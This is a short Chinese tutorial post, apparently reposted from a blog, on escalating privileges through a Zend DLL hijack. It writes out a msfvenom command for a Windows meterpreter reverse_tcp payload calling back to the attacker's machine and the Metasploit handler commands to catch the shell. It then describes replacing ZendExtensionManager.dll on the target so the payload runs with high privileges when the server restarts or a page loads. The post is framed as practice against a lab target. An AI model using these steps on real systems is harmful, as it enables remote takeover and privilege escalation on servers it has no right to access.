首页 > 系统服务 > 详细

第十三节 zend反弹shell提权

时间:2021-08-14 17:46:00      阅读:55      评论:0      收藏:0      [点我收藏+]

1. 漏洞利用过程

  msfconsole生成反弹shell:

  msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe

  在其中一个dos框中进行监听:

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost kaliip

    set lport 设置端口

    run/exploit

  将生成的shell.exe上传到靶机中。然后打开Zend_DLL_Hijacking.exe,填入exe路径。DLL路径就是改过名字的原来的ZendExtensionManager.dll的路径。然后生成DLL文件。随后将生成的DLL文件上传到原ZendExtensionManager.dll路径位置顶替冒充。一旦靶机重新启动或者攻击者重新访问web页面(例如其中的phpinfo())就会重新加载dll,此时msf便会监听到对话并且权限为高权限。

第十三节 zend反弹shell提权

原文:https://www.cnblogs.com/EndlessShw/p/15141198.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!